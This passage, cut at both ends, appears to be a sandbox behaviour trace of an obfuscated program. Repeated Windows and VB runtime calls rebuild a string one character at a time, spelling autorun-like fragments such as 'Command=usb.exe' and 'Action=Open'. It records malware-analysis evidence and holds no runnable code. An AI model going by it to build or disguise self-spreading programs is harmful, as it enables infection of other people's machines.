lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.858] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0172.859] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.859] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0172.860] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.860] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.860] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.861] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0172.861] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.862] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0172.862] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.863] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0172.863] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.864] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0172.864] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.865] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0172.865] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.866] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.866] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.867] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0172.867] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.867] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0172.868] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.868] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0172.868] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.869] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0172.869] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.870] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0172.870] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.871] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0172.871] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.871] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0172.872] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.872] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0172.873] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="J", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.873] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0172.873] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.874] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0172.874] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.875] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0172.875] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.876] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="b", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0172.876] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.877] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0172.877] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.878] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.878] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.878] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0172.879] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.975] VarSub (in: pvarLeft=0x28f960, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11685c4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.976] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f920, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.977] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0172.977] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.978] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0172.978] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.979] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0172.980] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.980] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0172.981] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.982] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0172.982] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.983] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0172.983] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="J", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.984] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0172.984] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.985] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0172.986] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.986] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x1168614, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0172.987] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.988] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.988] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.991] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0172.991] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 